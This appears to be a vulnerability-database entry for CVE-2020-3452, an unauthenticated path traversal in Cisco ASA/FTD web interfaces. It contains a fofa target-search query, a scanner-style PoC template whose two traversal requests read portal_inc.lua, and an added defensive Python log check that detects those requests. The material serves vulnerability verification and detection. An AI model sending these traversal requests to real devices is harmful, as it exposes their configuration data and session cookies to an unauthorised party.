CVE-2020-3452: Cisco Read-Only Path Traversal

Date: 2025-08-01 | Affected software: Cisco | PoC: public

Vulnerability description

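The web management interface of firewall devices and Cisco Firepower Threat Defense (FTD) devices contains an unauthenticated directory traversal vulnerability that allows remote arbitrary file read. An attacker can only view files under the web directory; files outside the web directory cannot be accessed through this vulnerability. The vulnerability can expose WebVPN device configuration information, cookies, and similar data.

fofa: title="SSL VPN Service"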

PoC code [public]

id: CVE-2020-3452

info:
  name: Cisco Read-Only Path Traversal
  author: 不动明王
  severity: high
  verified: true
  description: |
    防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。
    攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
    fofa:  title="SSL VPN Service"
  reference:
    - https://zhuanlan.zhihu.com/p/163246632
    - https://nvd.nist.gov/vuln/detail/CVE-2020-3452
  tags: cve,cve2020,cisco,traversal,readfile
  created: 2023/08/17

rules:
  r0:
    request:
      method: GET
      path: /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
    expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")

  r1:
    request:
      method: GET
      path: /%2bCSCOT%2b/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
    expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
expression: r0() || r1()
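
The request patterns in rules r0 and r1 can also be matched on the defensive side. The following log check is an added example, not part of the original template. It assumes Common Log Format access logs from a proxy or sensor in front of the device; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Endpoints and parameters used by rules r0 and r1 above (%2b decodes to "+").
ENDPOINTS = {
    "/+CSCOT+/oem-customization": ("platform", "resource-type", "name"),
    "/+CSCOT+/translation-table": ("textdomain", "lang"),
}
# Assumption: Common Log Format lines from a proxy or sensor in front of the device.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode(value, rounds=3):
    """Percent-decode repeatedly so that nested encoding is normalised before matching."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def is_traversal_probe(target):
    """True if the request target matches the r0/r1 pattern from the template."""
    parts = urlsplit(target)
    params = ENDPOINTS.get(decode(parts.path))
    if params is None:
        return False
    # Split the query by hand: parse_qsl would turn a literal "+" into a space.
    query = {}
    for pair in parts.query.split("&"):
        key, _, val = pair.partition("=")
        query[decode(key)] = decode(val)
    return any(".." in query.get(p, "") or "+CSCOE+" in query.get(p, "") for p in params)

def scan(lines):
    """Return (client_ip, status) for every log line that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_probe(m["target"]):
            hits.append((m["ip"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2020:10:00:00 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2020:10:00:05 +0000] "GET /%2bCSCOT%2b/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Aug/2020:10:00:06 +0000] "GET /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 0',
]
```

`scan(SAMPLE)` returns the two requests from 198.51.100.7 and ignores the ordinary translation-table request. A logged 200 on a flagged request is a triage priority, since the template's expression also requires status 200 before it checks the body.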
